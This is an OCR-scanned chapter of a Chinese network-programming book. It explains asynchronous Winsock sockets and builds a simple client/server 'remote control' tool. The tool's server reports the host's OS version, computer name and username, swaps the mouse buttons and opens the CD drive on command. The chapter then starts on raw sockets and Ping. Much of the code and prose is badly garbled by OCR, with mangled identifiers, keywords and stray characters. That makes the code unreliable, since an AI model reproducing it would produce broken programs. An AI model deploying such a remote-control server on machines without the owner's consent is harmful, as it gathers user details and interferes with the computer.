wMsg: 指定 当 网 络 事件 发 生 时 向 窗口 发 送 的 消息 。 该 消息 是 一 个 自 定义 消息 , 定义 自 定 
义 消息 的 方法 是 在 WM_USER 的 基础 上 加 一 个 数值 ， 比 如 (WM_USER + 1)。 

lEvent: 指定 应 用 程序 感 兴趣 的 通知 码 。 它 可 以 被 指定 为 多 个 通知 码 的 组 合 。 常 用 的 通 
知 码 有 FD_READ〈 套 接 字 收 到 对 端 发 来 的 数据 包 )、FD_ACCEPT 监听 中 的 套 接 字 有 连接 
请 求 )、FD_CONNECT ( 套 接 字 成 功 连 接 到 对 方 ) 和 FD_CLOSE〈( 套 接 字 对 应 的 连接 被 关闭 )。 
在 指定 通知 码 时 不 需要 全 部 将 其 指定 。 对 于 基于 TCP 协议 的 客户 端 来 说 ,FD_ACCEPT 是 没 
有 意义 的 ， 对 于 基于 TCP 的 服务 端 来 说 ，FD_CONNECT 是 没有 意义 的 ， 对 于 基于 UDP 协议 
的 客户 端 和 服务 器 端 来 说 ，FD_ACCEPT、FD_CONNECT 和 FD _CLOSE 都 是 没有 意义 的 。 


2.3.2 非 阻塞 模式 下 简单 远程 控制 的 开发 


在 了 解 如 何 将 套 接 字 设 置 为 非 阻 塞 模式 以 后 ， 这 里 完成 一 个 简单 的 远程 控制 工具 。 这 里 
要 编写 的 远程 控制 工具 是 基于 C/S 模式 的 ， 即 客户 端 /服务 器 端 模式 的 架构 。 客 户 端 通过 发 送 
控制 命令 ， 操 作 服 务 器 端 接 收 到 控制 命令 后 响应 相应 的 事件 ， 完 成 特定 的 功能 。 

这 个 远程 控制 的 服务 器 端 只 简单 实现 以 下 几 个 功能 。 

。 向 客户 端 发 送 帮助 信息 。 

。 将 服务 器 信息 发 送 给 客户 端 。 

。 交换 鼠标 的 左右 键 和 恢复 鼠标 的 左右 键 。 

。 打开 光驱 和 关闭 光驱 。 

1. 远程 控制 软件 框架 设计 

远程 控制 分 为 控制 端 和 被 控制 端 ， 控 制 端 通常 为 客户 端 ， 而 被 控制 端 通常 为 服务 器 端 。 对 
于 客户 端 来 说 ， 它 需要 3 种 通知 码 ， 即 FD_CONNECT、FD_CLOSE 和 FD_READ。 对 于 服务 
器 端 来 说 ， 它 需要 3 种 通知 码 ， 即 FD ACCEPT、FD_ CLOSE 和 ED_ READ， 如 图 2-12 所 示 。 

这 里 解释 一 下 图 2-12， 并 对 它 的 框架 设计 







id Ne Serve Cli 
进行 补充 。 对 于 服务 器 端 (Server 端 ) 来 说 ， 
它 需 要 处 于 监听 状态 等 待 客户 端 (Client 端 | "DACCEPT HD ReaD 


FD CLOSE 


发 起 的 连接 (FD_ACCEPT)， 在 连接 后 会 等 待 
接收 客户 端 发 来 的 控制 命令 (FD_READ)， 当 
客户 端 断 开 连接 后 就 可 以 结束 此 次 通信 了 
(FD_CLOSE)。 对 于 客户 端 来 说 ， 它 需要 等 待 确认 连接 是 否 成 功 (FD_CONNET); 当 连 接 成 


FD CONNECT 





图 2-12 服务 器 端 和 客户 端 通信 
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功 后 就 可 以 向 服务 器 端 发 送 控制 命令 ， 并 等 待 接 收 命令 响应 结果 (FD_READ); 当 服 务 器 端 
被 关闭 后 ， 通 信 则 强制 被 结束 了 (FD_CLOSE)。 因 此 ， 服 务 器 端 需要 的 通知 码 有 FD_ACCEPT、 
FD_READ 和 FD_CLOSE, 客户 端 需要 的 通知 码 有 FD_CONNECT、 FD_READ 和 FD_CLOSE。 

客户 端 向 服务 器 端 发 送 的 命令 为 “字符 串 ” 类 型 的 数据 。 当 服务 器 接收 到 客户 端 发 来 的 
命令 后 ， 需 要 判断 命令 ， 然 后 执行 相应 的 功能 。 

服务 器 向 客户 端 反 馈 的 执行 结果 可 能 为 字符 串 ， 也 可 能 为 其 他 的 数据 结构 类 型 的 内 容 。 
由 于 反馈 数据 的 格式 无 法 确定 ， 那 么 对 于 服务 器 向 客户 端 反 馈 的 信息 必须 做 特殊 的 标记 ， 通 
过 标记 判断 发 送 的 数据 格式 。 而 客户 端 接收 到 服务 器 端 发 来 的 数据 后 , 必须 对 格式 进行 解析 ， 
以 便 正确 读 取 服 务 器 端 返回 的 命令 反馈 结果 。 服 务 器 端的 反馈 数据 协议 格式 如 图 2-13 所 示 。 








szValue[0x200] 


该 部 分 保存 真正 的 数据 部 分 ， 可 以 是 
文本 ， 也 可 以 是 其 他 数据 结构 
该 部 分 保存 二 级 类 型 码 ， 用 于 区 分 不 


| 同 的 数据 结构 


| 该 部 分 保存 一 级 类 型 码 ， 用 于 区 分 是 
: ~ 文本 数据 和 特定 数据 结构 ， 如 果 不 是 
文本 数据 则 要 继续 判断 二 级 类 型 码 


图 2-13 服务 器 端 反馈 数据 协议 格式 





从 图 2-13 可 以 看 出 ,服务 器 对 于 客户 端的 反馈 数据 协议 格式 有 3 部 分 内 容 , 第 1 部 分 bType 
用 于 区 分 是 文本 数据 和 特定 数据 结构 的 数据 ， 第 2 部 分 bClass 用 于 区 分 不 同 的 特定 数据 结构 ， 
第 3 部 分 szValue 是 真正 的 数据 部 分 。 对 于 服务 器 反馈 的 数据 ， 如 果 是 文本 数据 ， 那 么 客户 端 直 
接 将 szValue 中 的 字符 串 显示 输出 ; 如 果 反 馈 的 是 特定 的 数据 结构 , 则 必须 区 分 是 何 种 数据 结构 ， 
最 后 按照 直接 的 数据 结构 解析 szValue 中 的 数据 。 将 该 协议 格式 定义 为 数据 结构 体 ， 如 下 : 


Hdefine TEXTMSG 吧 呈 一 太 表 蒜 这 术 信 息 
#define BINARYMSG  'b'  ”// 表示 特定 的 数据 结构 


typedef struct _DATA MSG 
{ 


BYTE bType; /7 数据 的 类 型 
BYTE bClass? // 数据 类 型 的 补充 
char szValue[0x200]; ”// 数据 的 信息 


}DATA MSG, *PDATA MSG; 

2， 远程 控制 软件 代码 要 点 

本 节 的 最 开始 介绍 了 WSAAsyncSelect() 函 数 原型 和 参数 的 含义 ， 现 在 来 具体 介绍 如 何 使 
用 WSAAsyncSelect() 函 数 的 使 用 。WSAAsyncSelect() 函 数 在 使 用 时 会 将 指定 的 套 接 字 、 窗 口 
句柄 、 自 定义 消息 和 通知 码 关联 在 一 起 ， 使 用 如 下 : 

// 初始 化 Winsock 库 


WSADATA wsaData; 
WSAStartup (MAKEWORD (2, 2), &wsaData); 


// 创建 套 接 字 并 将 其 设置 为 非 阻塞 模式 
m ListenSock = socket (PF _INET, SOCK STREAM, IPPROTO TCP); 
WSAAsyncSelect (m ListenSock, GetSafeHwnd(), UM SERVER, FD ACCEPT); 
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在 代码 的 WSAAsyncSelect0 函 数 中 , 第 1 个 参数 是 新 创建 的 用 于 监听 的 套 接 字 m_ListenSock， 
第 2 个 参数 使 用 MFC 的 成 员 函 数 GetSafeHwnd() 来 得 到 当前 窗 体 的 句柄 ， 第 3 个 参数 
UM_SERVER 是 一 个 自 定 义 的 类 型 ,最 后 一 个 参数 FD_ACCEPT 是 该 套 接 字 要 接收 的 通知 码 。 
函数 中 的 第 3 个 参数 是 一 个 自 定义 的 消息 。 在 服务 器 端 ， 该 消息 的 定义 如 下 : 


#define UM SERVER (WM USER + 200) 

当 有 客户 端 与 服务 器 端 连接 时 ， 系 统 会 发 送 UM_SERVER 消息 到 与 监听 套 接 字 关 联 的 句 
柄 指定 的 窗口 。 当 窗口 收 到 该 消息 后 ， 需 要 对 该 消息 进行 处 理 。 该 处 理 函 数 也 需要 手动 进行 
添加 ， 添 加 有 3 处 地 方 。 


第 1 处 是 在 类 定义 中 添加 ， 代 码 如 下 : 

ZX 生成 的 消息 映射 函数 

//{{AFX MSG (CServerDlg) 

virtual BOOL DOnInitDialog() 7 

afx msg void OnSsysCommand (UINT nID, LPARAM lParam); 
afx msg void Onpaint(); 

afx msg HCURSOR OnouezryDragIcon () 

afx msg VOID OnSock (WPARAM wParam, LPARAM lParam); 
afx msg void OncClose() 上 

//}}AFX MSG 

DECLRARBE_MESSRAGE_MRE1) 


在 这 里 添加 afk msg VOID OnSock(WPARAM wParam, LPARAM lParam); 
第 2 处 在 类 实现 中 添加 对 应 的 函数 实现 代码 ， 如 下 : 


VOID CServerDlg: :OnSock (WPARAM wParam, LPARAM lParam) 
{ 


前 装 发 习 啊 狂 册 忆 浊 


| 


} 
第 3 处 是 要 添加 消息 上 映射， 代码 如 下 : 


BEGIN MESSAGE MAP (CServerDlg, CDialog) 
//{{AFX MSG MAP (CServerDlg) 

ON_WM_ SYSCOMMAND () 

ON_ WM PAINT () 

ON WM QUERYDRAGICON () 

ON_ MESSAGE (UM SERVER, OnSock) 
ON_WM_CLOSE () 

//}}AFX MSG MAP 

END_ MESSAGE MAP () 


在 这 里 添加 ON _MESSAGE(UM_SERVER, OnSock)。 

通过 以 上 3 步 ， 在 程序 中 就 可 以 接收 并 响应 对 UM_SERVER 消息 的 处 理 。 
3. 远程 控制 界面 布局 

首先 来 看 远程 控制 客户 端 与 服务 器 端的 窗口 界面 ， 如 图 2-14 所 示 。 


2 


















NN ss 7 
发 末 傅 令 ;open 
| 四 发 来 病 今 .iatsysinfa ee 








请 求 地 址 是 192 168 58,1;3053 








图 2-14 ”远程 控制 端 与 服务 器 端 界 面 布 局 
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在 图 2-14 中 ，SERVER 表示 服务 器 端 ，Client 表示 客户 端 。 服 务 器 端 (Server) 运行 在 
虚拟 机 中 ， 客 户 端 《Client) 运行 在 物理 机 中 。 通 过 图 2-14 可 以 看 出 ， 物 理 机 中 客户 端 与 服 
务 器 端 是 可 以 正常 进行 通信 的 。 

服务 器 端的 软件 只 有 一 个 用 于 显示 多 行文 本 的 编辑 框 。 该 界面 比较 简单 。 

客户 端 软 件 在 卫 地 址 后 的 编辑 框 中 输入 服务 器 端的 人 P 地 址 ， 然 后 单 击 “ 连 接 ” 按 钮 ， 
客户 端 会 与 远 端的 服务 器 进行 连接 。 当 连接 成 功 后 ， 输 入 卫 地 址 的 编辑 框 会 处 于 只 读 状 态 ， 
“连接 ”按钮 变 为 “ 断 开 连接 ”按钮 。 对 于 发 送 命令 后 的 编辑 框 变 为 可 用 状态 ,“ 发 送 ”按钮 
也 变 为 可 用 状态 。 

对 于 软件 界面 的 布局 ， 读 者 可 以 自行 调整 。 

4. 服务 器 端 代码 的 实现 

当 服 务 器 启动 时 ， 需 要 创建 套 接 字 ， 并 将 套 接 字 设置 为 异步 模式 ， 绑 定 IP 地 址 和 端口 号 
并 使 其 处 于 监听 状态 ， 代 码 如 下 : 


BOOL CServerDig::OnInitDialog() 


/7 添加 其 他 初始 化 代码 

// 初始 化 Winsock 库 

WSADATA wsaData; 

WSAStartup (MAKEWORD (2, 2), &wsaData); 


// 创建 套 接 字 并 将 其 设置 为 非 阻 塞 模式 
mlistenSookl aocket (PE LINETD, SOCK, STREAM; TPPRROTO TEP)y 
WSAAsvyncSselect (m Listensock, GetSafeHwnd{(), UM SERVER, FD ACCEPT); 


sockaddr in addr; 

addr.sin family = AR _ INET; 
addr.sin addr.s un.S_addr = ADDR ANY; 
addr Srport ShntonslodoD) 


// 绑 定 I 地 址 及 5555 端口 ， 并 处 于 监听 状态 
bind(m ListenSock, (SOCKADDR*)&addr, sizeof (addr)); 
listen(m ListensSocky 1): 


Eeturn TRUEY DA veturn TRUE unless vou set the foeus to a control 
} 
当 客户 端 与 服务 器 端 进行 连接 时 ， 需 要 处 理 通知 码 FD_ACCEPT， 并 且 创 建 与 客户 端 进 
行 通信 的 新 的 套 接 字 。 对 于 新 的 套 接 字 也 需要 设置 为 异步 模式 ， 并 且 需 要 设置 FD_READ 和 
FD_CLOSE 两 个 通知 码 。 代 码 如 下 : 


VOID CServerDlg: :OnSock (WPARAM wParam,;, LPARAM lParam) 
{ 





if ( WSAGETSELECTERROR (lParam) ) 
{ 
return x 


} 
Switch ( WSAGETSELECTEVENT (lParam)) 


/7 处理 FD_ACCEPT 
case FD ACCEPT: 
{ 
sockaddr in ClientAddr; 
int nsize = sizeof (ClientAddr); 


m ClientSock = accept (m ListenSock, (SOCKADDR*)&ClientAddr, gnSize); 
WSAAsSyncSelect (m ClientSsock, GetSafefHwnd(), UM SERVER, FD READ | FD CEOSE); 


前 车 鞠 习 啊 酒 册 愉 避 


[ 
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m StrMsg. Format (请求 地 址 是 和 $s :ga 
inet ntoa(ClientAddr.sin addr), ntohs'{CliientAddr.sin port)); 


“ 量 DATA MSG DataMsg; 
| DataMsg.bType 二 TEXTMSG; 
军 | DataMsg.bClass = 0; 

lstropy (DataMsg,szValue, HELPMSG); 
sendl(m ClientSock, (const char *)&DataMsg, sizeof(DataMsg), 0); 
网 break; 
络 } 
编 /7 处 理 FD READ 
程 case FD READ: 

{ 
char szBurlMiXBYTH] = 1 0 ja 
NR recv (m, ClientSock, szBuf, MAXBYTE, 0)3 


DispatchMsg (szBuf),; 

Mm StzMsg' 二 对方 发 来 命令 :5 
mStrMsg += /2But: 

Dreak; 


} 
// 处 理 FD_ CEOSE 
case FD CLOSE: 


{ 
closesocket (m ClientSock); 


m StrMsg 二 "对方 关 闭 连 接 "， 


break; 
} 


InsertMsg(); 
} 


在 代码 中 ， 当 响应 FD_READ 通知 码 时 会 接收 客户 端 发 来 的 命令 ， 并 通过 DispatchMsg() 
函数 处 理 客 户 端 发 来 的 命令 。 在 OnSock() 函 数 的 最 后 有 一 个 InsertMsg() 函 数 ， 该 函数 用 于 将 
接收 的 命令 显示 到 界面 上 对 应 的 消息 编辑 框 中 。 

DispatchMsg() 函 数 用 于 处 理 客户 端 发 来 的 命令 ， 该 代码 如 下 : 


VOID CServerDlg: :DispatchMsg (char *szBuf) 
{ 











DATA MSG DataMsg; 
ZeroMemory((void*)gDataMsg, sizeof (DataMsg)); 


1 0strom(s BE, vielp yy 
{ 
DataMsg.bType = TEXTMSG; 
DataMsg.bClass 二 "0;» 
lstrecpy (DataMsg.,szValue, HELPMSG) : 
} 
else mem ltr cm torBrs," "oetovmsintory) 
{ 
SYS TNEO SYSTnEo, 
GetSysdTntod&SYysTInEO) 
DataMsg.bType = BINARYMSG; 
DataMsg.bClass = SYSINFO; 
memcpy( (void *)DataMsg.szValue, (const ehar *)&SysIinfo, sizeof(DataMsg)); 
| } 
elsel ae (hetremp (szhurr toner ny) 
| 
由 
SetOdaudio (TRUE)'; 
DataMsg.bType = TEXTMSG; 
DataMsg.bClass = 0: 
lstropy (DataMsg.szValue，"open 命令 执行 完成 ") ; 
} 
elseldel( etrempl(lssBus, Melose™)l ) 
{ 





OD 
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SetCdaudio (FALSE); 
DataMsg.bType = TEXTMSG'; 


DataMsg.bClass = 0; 第 

lstrcpy(DataMsg.szValue,， "close 命令 执行 完成 ") ; 2 
} 让 
else 4E .( etrecmp(lszBurr "swap™) ) Es 
1 黑 

SetMouseButton (TRUE) ， 元 二 

DataMsg.bType = TEXTMSG; 客 

DataMsg.bClass = 0; 网 

lstrcpy(DataMsg.,szValue， "swap 命令 执行 完成 ")， 络 
} 编 
elsel lf (Utrem (es Bua, restore yl 程 
1 

SetMouseButton (FALSE), 

DataMsg.bType = TEXTMSG; HR 


DataMsg.bClass = 07 
lstrcpy (DataMsg.szValue，"restore 命令 执行 完成 ") ; 
} 
else 
{ 
DataMsg.bType = TEXTMSG; 
DataMsg.bClass = 0; 
1strcpy(DataMsg.szValue，" 无 效 的 指令 ") ; 
} 


// 发 送 命令 执行 情况 给 客户 端 
send (Im ClientSock， (censt char *)&DataMsg, sizeof (DataMsg), 0); 
} 


在 DispatchMsg() 函 数 中 ， 通 过 这 )...else if()...else() 比 较 客 户 端 发 来 的 命令 执行 相应 的 功 
并 将 执行 的 结果 发 送 给 客户 端 。 

命令 功能 的 实现 函数 如 下 : 

VOID CServerDlog: etSysinfo (PS TNEO (SysTinto) 

{ 


unsigned long nSize = 0; 


SysIinfo->OsVer.dwOSVersionInfoSsize = sizeof (OSVERSIONINFO)’; 
GetVersionEx(&SysIinfo->OsVer); 
nsSize = NAME LEN; 
GetComputerName (SysInfo->szComputerName, &nSize); 
nSsize = NAME LEN; 
GetUserName (SysIinfo->szUserName, &nSize); 
} 


VOID CServerDlg::SetCdaudio (BOOL boOpen) 
{ 


EE BOpen 
// 打开 光驱 | 
mciSsSendstring("set cdaudio door open", NULL, NULL, NULL); 

人 
/7 关闭 光驱 


meiSsendSstring("set eaaiaileo goacz cosed NOT NODD NULL)S 


VOID CServerDlg::;SetMouseButton (BOOL bSwap) 


{ 
if ( bSwap) 


XX 交换 
SwapMouseButton (TRUE); 
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else 
第 /L/W 恢复 
2 SwapMouseButton (FALSE)，; 
2 } 
} 
黑 这 里 面 对 于 getsysinfo 命令 ， 需 要 定义 一 个 结构 体 ， 具 体 如 下 : 
客 #define HELPMSG "帮助 信息 ; NzNi™ AN 
网 NE heyp : 显示 帮助 菜单 NxNn™ i 
络 WwWNEE etsveinEd I 获得 对 方 主机 信息 \rNan N 
编 mt GEeR 9- 打 开关 驱 WENRY ON 
程 "tCLlose 关闭 站 驶 NEN AN 
村 TAN SNWSE : 交换 鼠标 左右 键 \r\n” 和 
TAN 七 restore : 恢复 鼠标 左右 键 " 和 
aa 


#define NAME LEN 20 


tyBedetl Steuot SYS.TNEO 
{ 


OSVERSIONINEO OsvVer; // 保存 操作 系统 信息 
char szComputerName [NAME LEN]; // 保存 计算 机 名 
char szUserName [NAME, LEN]:; /7 保存 当前 登录 名 


SSTNE "Ese LNRo 

该 结构 体 不 是 文本 类 型 的 数据 ， 需 要 在 反馈 协议 中 填充 bClass 字段 。 对 于 getsysinfo 命 
令 ， 该 bClass 字段 填充 的 内 容 为 “SYSINFO”。SYSINFO 的 定义 如 下 : 

#define SYSINFO 0x01L 


调用 meiSendString0) 函 数 需 要 添加 头 文 件 和 库 文件 ， 上 有 具体 如 下 : 


#include <mmsystem.h> 
#pragma comment (lib, "Winmm") 


至 此 , 服务 器 端的 主要 功能 就 介绍 完了 , 最 后 还 有 两 个 函数 没有 列 出 , 分 别 是 InsertMsg() 
函数 和 释放 Winsock 库 的 部 分 ， 代 码 如 下 : 


void CServerDlg: :OnClosetl) 


人 
// 添加 处 理 程序 代码 或 调用 默认 方法 
// 关闭 监听 套 接 字 ， 并 释放 Winsock 库 
closesocket (m ClientSock); 
closesocket (m ListenSsock); 
WSsACleanup () 7 





CDial5g3 onclose (区 


VOID tSenverDlhg: vinsertyagl) 
{ 
Cotring, StrMeoy 
GatDlgltemText (DC MSG, strMesgy); 


{mS ieeer 下 二 aN 7 
eG fs ei hp rEg oa er pT a a Re 
mntrMsd += strMsg 
SetDlgItemText (IDC MSG, m StrMsg); 
mstrMsg = 
} 


5. 客户 端 代 码 的 实现 
客户 端的 代码 基本 与 服务 端的 代码 类 似 ， 这 里 就 不 再 说 明 。 
连接 远程 服务 器 的 代码 如 下 : 


Vol olanthld Onno 


{ 
// 添加 处 理 程序 代码 
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char szBtnName[10] = { 0 }; 
GetDlgIitemText (IDC BTN CONNECT, szBtnName, 10); 


// 断 开 连 接 

if ( !lstrcemp(szBtnName, " 断 开 连 接 ") ) 

{ 
SetDlgItemText (IDC. BTN_CONNECT, "连接 "); 
(GetDlgItem(IDC SZCMD) ) ->EnableWindow (EALSE)'; 
(GetDlgIitem(1IDC BTN SEND) ) ->EnableWindow (FALSE); 
(GetDlgItem(IDC TPADDR)) ->EnableWindow (TRUE); 
closesocket (m Secket) 
m_ StrMsg = "主动 断 开 连 接 "; 
InsertMsg()? 
Eeturn ? 


} 

// 连接 远程 服务 器 端 

char szlpAddr [MAXBYTE] = { 0 }; 
GetDlgItemText (IDC_ IPADDR, szIpAddr, MAXBYTE), 


m Socket = socket (PE INET, SOCK STREAM, TPPROTO TCP); 


WSsAAsyncSelect (m Socket,GetSafeHwnd(),UM CLIENT, FD READ | FD CONNECT | 


sockaddr in ServerAddr; 

ServerAddr .sin family = AF INET; 
gearveraAddr -sin addr.a mm.s addr = "inet addr (ssipaddr)y 
ServerAddr.sin port = htons(5555); 


connect(m Socket, (SOCKADDR*)&ServerAddr, sizeof (SeérverAddr)),; 


响应 通知 码 的 函数 如 下 : 
VOID CClientDlg::OnSock (WPARAM wParam, LPARAM lParam) 
{ 
if ( WSAGETSELECTERROR (lParam) ) 
{ 
veturn 区 


} 
Switch ( WSAGETSELECTEVENT (lParam)) 


// 处 理 FD ACCEPT 
Case FD CONNECT: 
4 
(GetDlgItem(IDC SZCMD))->EnableWindow (TRUE); 
(GetDlgItem(IDC BTN_SEND))->EnableWindow (TRUE); 
(GetDlgItem(IDC TPADDR))->EnableWindow (FALSE); 


setDlgrtemText (IDC_BTN CONNECT，" 断 开 连 接 ") ; 
m_StrMsg = "连接 成 功 "; 
break; 

} 

// 处 理 FD_READ 

case FD READ: 

DATA MSG DataMsg; 
recv(m Socket, (char *)&DataMsg, sizeof' (DataMsg), 
DispatchMsg( (char *)&DataMsg):; 
breaks: 


} 
17 处 理 FD CLOSE 
Case ED_CDOSR 
{ 
(GetDlgItem(IDC SZCMD))->EnableWindow (FALSE),; 
(GetDlgItem(IDC BTN, SEND))->EnableWindow (FALSE); 
(GetDlgIitem(IDC IPADDR))->EnableWindow (TRUE); 


0); 


FD CLOSE); 


超 久 小 


前 世 韦 加 史 汀 
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超 久 潍 


前 世 瞎 到 只 湘 


closesocket (nm Sooket)':; 
m_StrMsg = "对 方 关闭 连接 "; 


break; 
} 
InsertMsg(); 


发 送 命令 到 远程 服务 器 端的 代码 如 下 : 


vold CClientDig:OnBtnSsend() 


i 

// 添加 处 理 程序 代码 
char szZBut [MAXBYTE] = € 0 he 
GetDlgltemtext!(LIDC SECMD, "szBuF," MAXBYTEY: 


send'(m Socket, szBuf, MAXBYTE, 0)'; 
} 
处 理 服 务 器 端 反 馈 结 果 的 代码 如 下 : 


VOID OCLientpDlig!'DispatehnMao (charl*sz as) 
{ 


TH 





DATA MSG DataMsg; 
memcpy ((void*)g&DataMsg, (const void *)szBuf, sizeof (DATA MSG) ): 


if ( DataMsg.bType ==| TEXTMSG ) 

下 
mStrMsg = DataMsg.szValue; 

} 

else 

' 
if ( DataMsg.bClass == SYSTEMINEO) 
nl 

ParseSysInfo((PSYS TNFON SDataMsg. smValude)s 

} 

} 

} 


解析 服务 器 端 信息 的 代码 如 下 : 
WOEBD CCliantplo Parse ynnto(leav mm Sy into) 
{ 
if'( .SysIinfo->0sVer.dwplatformrid 二 = VER PLATEFORM WIN32 NT ) 
{ 
if ( SysIinfo->OsVer.dwMajorVersion == 5 && SySInfo->OsVer.dwMinorVersion == ) 
{ 
m_StrMsg ,Format ("对 方 系统 信息 :\r\n\t Windows XP %s", SysInfo->0sVer. szCSDvVersion); 
} 
else if ( SysIinfo->0sVer.dwMajorVersion == 5 && SysInfo->OsVer.dwMinorVersion== 0) 
' 
m_StxrMsg.Format ("对 方 系统 信息 :\r\n\t Windows 2K"); 
上}. 
} 
else 
{ A 
m_StrMsg.Format ("对 方 系统 信息 :\r\n\t Other System \r\n"); 
} 


mm StnMad t= TN, 
m StrMsg += "\t Computer Name is "7 
m StrMsg += Sysinfo->szComputerName; 
mStrMsg + "Nr 
mstrMsg += "\t UserName, Be, 
mStrMsg + SyYySInfo->szUserName: 

, 


到 这 里 ， 远 程控 制 的 代码 就 完成 了 。 如 果 要 实现 更 多 的 功能 ， 可 能 该 框架 无 法 进行 更 好 
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的 扩充 。 该 实例 主要 为 了 演示 非 阻 塞 模式 的 Winsock 应 用 的 开发 。 如 果 该 实例 中 的 套 接 字 使 
用 阻塞 模式 的 话 ， 那 么 就 必须 配合 多 线程 来 完成 ， 将 接收 的 部 分 单独 放 在 一 个 线程 中 ， 否 则 
接收 数据 的 函数 recv0 在 等 待 接收 数据 的 到 来 时 会 将 整个 程序 “ 卡 死 ” 
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本 章 最 开始 介绍 了 关于 TCP 和 UDP 的 程序 开发 所 使 用 的 函数 。 使 用 TCP 或 UDP 时 ， 
需要 在 调用 socket(0) 函 数 时 为 它 的 第 2 个 参数 指定 相应 的 类 型 ， 比 如 SOCK_ STREAM 是 
代表 要 使 用 TCP, 而 SOCK_ DGRAM 表示 要 使 用 UDP 协议 。 除了 可 以 指定 这 两 种 类 型 以 
外 ， 还 可 以 指定 为 原始 套 接 字 类 型 ， 即 SOCK RAW。 当 socket() 函 数 的 第 2 个 参数 指定 为 
SOCK STREAM 或 SOCE DGRAM 时 ， 第 3 个 参数 可 以 缺 省 。 而 当 socket(O) 函 数 的 第 2 个 参 
数 指定 为 SOCK RAW 时 ， 第 3 个 参数 就 必须 明确 指定 需要 使 用 的 协议 。 

a ile A SR 
ICMP、IPPROTO TCP、IPPROTO UDP 和 IPPROTO RAW。 使 用 前 四 种 类 型 ， 当 发 送 数 据 
时 ， 系 统 会 自动 为 数据 加 上 IP 首部 并 设置 IP 首部 中 的 上 层 协议 字段 (如果 有 IP _HDRINCL 
选项 ， 则 系统 不 会 自动 添加 IP 首部 ); 当 接 收 数据 时 ， 系 统 不 会 将 IP 首部 移 除 ， 需 要 程序 自 
行 处 理 。 如 果 使 用 IPPROTO_RAW， 那 么 系统 将 数据 包 直 接送 到 网 络 层 发 送 数 据 ， 并 且 需 要 
程序 自己 构造 IP wa 的 字段 。 

本 节 通 过 介绍 原始 套 接 字 实 现 经 典 的 网 络 命令 ， 即 Ping 命令 。 通 过 完成 一 个 Ping 命令 
Wd 


2.4.1 ”Ping 命令 的 使 用 


Ping 命令 的 目的 是 为 了 测试 另 一 台 主 机 是 否 可 达 ，Ping 命令 发 送 一 份 ICMP 回 显 请 求 报 
给 主机 ， 并 等 待 返回 ICMP 回 显 应 答 。 一般 来 说 ， 如 果 不 能 Ping 到 某 台 主机 ， 那 么 就 不 能 
et leet terion mpows\evtemsalemd exe 
的 防火 墙 将 进入 主机 的 回 显 请 求 报 文 屏蔽 掉 
了 ， 这 种 情况 虽然 Ping 不 通 , 但 是 仍然 可 以 

正常 进行 通信 )。 

Ping 命令 有 很 多 参数 ， 打 开 命 令 行 直 接 

输入 Ping 后 按 下 回 车 键 ， 这 样 就 可 以 看 到 

Ping 命令 的 参数 列表 ， 如 图 2345 所 示 。 
通常 情况 下 , 用 户 都 只 是 简单 Ping 一 下 

某 个 主机 的 地 址 。Ping 命令 的 参数 可 以 是 主 3 

机 名 称 、 域名 和 IP 地 址 , 后 两 者 是 较为 常用 图 2-15 Ping 命令 的 参数 列表 


的 。 下 面 简单 演示 一 个 Ping 的 例子 ， 具 体 如 下 : 
C:\>ping 8.8.4.4 
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Pinginyg 8.8.4.4 with 32 bytes of data: 
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Reply from 
Reply from 
Reply from 
RepLy from 


8.4.4: bytes=32 time=57ms TTL=47 
8.4.4: bytes=32 time=54ms TTL=47 
.8.4.4: bytes=32 time=54ms TTL=47 
8.4.4: bytes=32 time=5lms TTL=47 


Ping statisties,Eor, 8 0d.dt 

Packets; Sent = 4, Received = 4, Lost = 0 (0% loss), 
Approximate round trip times, in milli-seconds’s 

Minimum = 5lms, Maximum = 57ms, Average = 54ms 


上 面 就 是 笔者 使 用 Ping 命令 对 8.8.4.4 这 个 全 进行 回 显 请 求 后 的 输出 信息 。 这 里 来 解释 
一 下 请 求 后 的 回 显 信息 的 含义 。 


PLAGLne .0 witnl imsdorndaral 
正在 将 32 字 节 数据 发 送 到 远程 主机 8.8.4.4， 如 果 Ping 的 是 一 个 域名 或 主机 名 的 话 ， 这 
里 会 将 域名 《〈 主 机 名 ) 转换 为 IP 地 址 显示 出 来 。 


Replw From BB. 0 Bytess32 time=d Mma Tt 

本 地 主机 已 经 收 到 回 显 应 答 信息 ，bytes=32 表示 有 32 字 节 ，time=57ms 表示 公用 了 57 
毫秒 ，TTL 表示 的 是 生存 时 间 值 ， 该 值 可 以 进行 设置 ， 该 值 最 大 为 255。 每 个 处 理 数据 包 的 
路 由 器 都 需要 把 TTL 的 值 减 1 或 减 去 数据 包 在 路 由 器 中 停留 的 秒 数 。 由 于 大 多 数 路 由 器 转发 
数据 包 的 延 时 都 小 于 1 秒 , 因此 TTL 最 终 成 为 一 个 跳 站 的 计数 器 ， 所 经 过 的 每 个 路 由 器 都 将 
其 值 减 1， 当 该 值 被 减 到 0 值 时 ， 该 包 将 被 丢弃 。 

png tatisties Eos dA a 

Packets: Sent = 4, Received = 4; Lost = 0 (0% loss), 


Approximate round trip times in milli~seconds: 
Minimum = 5lms, Maximum = 57msr Average = 54ms 


Ping 8.8.4.4 的 统计 信息 为 : Sent=4 表示 发 送 了 4 个 数据 包 ，Received=4 表示 接收 了 4 个 
数据 包 ，Lost=0(0% loss) 表 示 丢 失 的 数据 包 是 0 个 ， 丢 包 率 为 0%。 

发 送 时 间 的 大 概 情况 ，Mininum=51ms， 最 快 是 Slms，Maximum=57ms， 最 慢 是 57ms， 
Average=54ms， 平 均 为 54ms。 


2.4.2 ”Ping 命令 的 构造 
Ping 命令 依赖 的 不 是 TCP, 也 不 是 UDP, 它 依赖 的 是 ICMP。ICMP 是 人 P 层 的 协议 之 一 ， 
它 传递 差错 报 文 以 及 其 他 需要 注意 的 信息 。ICMP 报 文通 常 被 IP 层 或 高 层 协议 使 用 。ICMP 


封装 在 IP 数据 报 内 部 ， 如 图 2-16 所 示 。 
ICMP 报 文 的 格式 如 图 2-17 所 示 。 
































8 位 类 型 8 位 代码 16 位 校 验 和 
-一 一 [PR 数 据 报 一 一 一 
ICMP 内 容 (依据 类 型 码 与 代码 而 定 ) 
IP 首 部 | ICMP 报 文 | 
图 2-16 ICMP 封装 在 IP 数据 报 内 部 图 2-17 ICMP 报 文 格式 








ICMP 协议 的 类 型 码 与 代码 根据 不 同 的 情况 ， 各 自 取 不 同 的 值 。Ping 命令 类 型 码 用 到 了 
2 个 值 ， 分 别 是 0 和 8。 而 代码 的 取 值 都 是 0。 当 类 型 码 取 值 为 0 时， 代码 的 0 值 表示 回 显 应 





© 





2.4 ”原始 套 接 字 的 开发 





